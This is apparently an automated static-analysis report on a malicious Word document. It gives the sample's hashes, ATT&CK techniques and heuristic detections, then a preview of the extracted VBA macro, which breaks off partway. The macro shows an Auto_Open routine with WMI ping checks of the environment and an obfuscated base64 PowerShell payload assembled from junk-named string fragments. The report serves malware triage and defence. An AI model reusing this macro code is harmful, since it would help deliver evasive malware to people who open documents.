Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a04faa1303fb9e2e…

MALICIOUS

Office (OLE)

Size: 328.0 KB
Created: 2018-03-12 20:00:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: f64f3900ec8abe9d6b12438ef9e49520
SHA-1: 82b962d55f305a1cea942d43f36f6ed1776a6145
SHA-256: a04faa1303fb9e2ecced0849e7bf0becff9d70f0b9dcfa80faac34b766b9a390
Risk Score: 212

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros with an Auto_Open subroutine, a common technique for executing malicious code as soon as the document is opened. The critical heuristic for a Shell() call in VBA indicates that the macro attempts to execute external commands. The script also uses GetObject to interact with WMI, potentially to check network connectivity or gather system information before proceeding with payload execution.

Heuristics (8)

  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Open macro [high] OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://help.github.com/articles/github-terms-of-service/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 127107 bytes
SHA-256: aab0e3213b97ab9a1d77284e8451846794b6086bef88f44291a8157c6b9d47ad
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
On Error Resume Next
    Set objPing = GetObject("winmgmts:").Get("Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True")
    With objPing
        Debug.Print "Status Code: " & .StatusCode
        If .StatusCode = 0 Then
            nt1 = False
        ElseIf .StatusCode > 0 Then
            nt1 = False
        Else 'No DNS Resolution
            nt1 = True
        End If
    End With
    
    Set objPing = GetObject("winmgmts:").Get("Win32_PingStatus.Address='" & Environ$("userdomain") & "',ResolveAddressNames=True")
    With objPing
        Debug.Print "Status Code: " & .StatusCode
        Debug.Print "Address: " & .Address
        If .StatusCode = 0 Then
            nt2 = True
        ElseIf .StatusCode > 0 Then
            nt2 = False
        Else 'No DNS Resolution
            nt2 = False
        End If
    End With
    
    If nt1 = True And nt2 = True Then
        Dim UnstorableNonglazed As String
        PettlingUrnflower = Array("u", "c", "b", "w", "d", "x", "h", "o", "-", "a", "p", "n", " ", "i", "l", "t", "s", "r", "y", "e")
        Dim ReconfirmDiplasion As String
        ReconfirmDiplasion = "SQBmACgAJABQ"
    
        Dim ApplianceAxles As String
        ApplianceAxles = "AFMAVgBlAHIAcwBJAE8A"
    
    
        Dim SiphonocladalesFinches As String
        SiphonocladalesFinches = "bgBUAGEAYgBMAGUALgBQA"
        Dim UnformulisticGalantine As String
        UnformulisticGalantine = "FMAVgBlAFI"
    
        Dim HeliophobiaPullalue As String
        HeliophobiaPullalue = "AUwBpAE8AT"
        StunsHypercorrectness = StunsHypercorrectness & ReconfirmDiplasion & ApplianceAxles & SiphonocladalesFinches & UnformulisticGalantine & HeliophobiaPullalue
        Dim CatapanOophytic As String
        CatapanOophytic = "gAuAE0AQQBKAE"
        Dim ShoplandIncendious As String
        ShoplandIncendious = "8AUgAgAC"
        Dim ErdCrofterization As String
        ErdCrofterization = "0ARwBFACAAMwApA"
        Dim SuperabstractlyVolpane As String
        SuperabstractlyVolpane = "HsAJABHAFAARg"
    
        Dim RulinglyDeputator As String
        RulinglyDeputator = "A9AFsAcgBlAGY"
        StunsHypercorrectness = StunsHypercorrectness & CatapanOophytic & ShoplandIncendious & ErdCrofterization & SuperabstractlyVolpane & RulinglyDeputator
        Dim TwiselBenamed As String
        TwiselBenamed = "AXQAuAEEAUwBzAGUAT"
        UnstorableNonglazed = UnstorableNonglazed + PettlingUrnflower(10)
        UnstorableNonglazed = UnstorableNonglazed + PettlingUrnflower(7)
        Dim RoughshodAdrip As String
        RoughshodAdrip = "QBiAEwAWQAu"
    
        Dim AlgeticWoodenly As String
        AlgeticWoodenly = "AEcARQB0AFQ"
    
        Dim CongealsGlistened As String
        CongealsGlistened = "AeQBQAE"
    
    
        Dim GastrologistGerfen As String
        GastrologistGerfen = "UAKAAnAFMA"
        StunsHypercorrectness = StunsHypercorrectness & TwiselBenamed & RoughshodAdrip & AlgeticWoodenly & CongealsGlistened & GastrologistGerfen
        Dim UnfurredFrankfort As String
        UnfurredFrankfort = "eQBzAHQAZQBtAC"
        Dim RetortureCorpselikeness As String
        RetortureCorpselikeness = "4ATQBhAG4"
    
    
        Dim SublistsAdvocatrice As String
        SublistsAdvocatrice = "AYQBnAGUA"
    
    
        Dim SplitRestabbing As String
        SplitRestabbing = "bQBlAG4AdAAuAEE"
    
        Dim UnkamedReferee As String
        UnkamedReferee = "AdQB0AG8AbQBhAHQA"
        StunsHypercorrectness = StunsHypercorrectness & UnfurredFrankfort & RetortureCorpselikeness & SublistsAdvocatrice & SplitRestabbing & UnkamedReferee
        Dim ContinuersAurothiosulphate As String
        Conti
... (truncated)